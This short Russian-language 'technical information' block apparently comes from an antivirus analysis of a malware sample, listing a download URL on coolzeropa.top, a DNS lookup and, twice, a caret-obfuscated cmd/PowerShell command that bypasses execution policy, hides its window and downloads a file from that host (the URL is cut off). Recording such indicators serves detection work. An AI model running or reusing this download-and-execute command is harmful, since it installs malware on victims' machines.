Техническая информация
- http://coolzeropa.top/admin.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWErSh^eL^l^.^e^Xe ^-eX^E^c^utIon^PO^L^Icy byPAss -n^OPRO^F^il^E -w^I^ndOws^TYle Hi^D^DE^N^ (^n^eW^-o^b^J^e^ct^ S^Y^StEM^.N^ET.^We^bCL^IEnT).downL^oAD^FILE('http://coolzerop...
- DNS ASK co###eropa.top
- '<SYSTEM32>\cmd.exe' /c "POWErSh^eL^l^.^e^Xe ^-eX^E^c^utIon^PO^L^Icy byPAss -n^OPRO^F^il^E -w^I^ndOws^TYle Hi^D^DE^N^ (^n^eW^-o^b^J^e^ct^ S^Y^StEM^.N^ET.^We^bCL^IEnT).downL^oAD^FILE('http://coolzerop...' (со скрытым окном)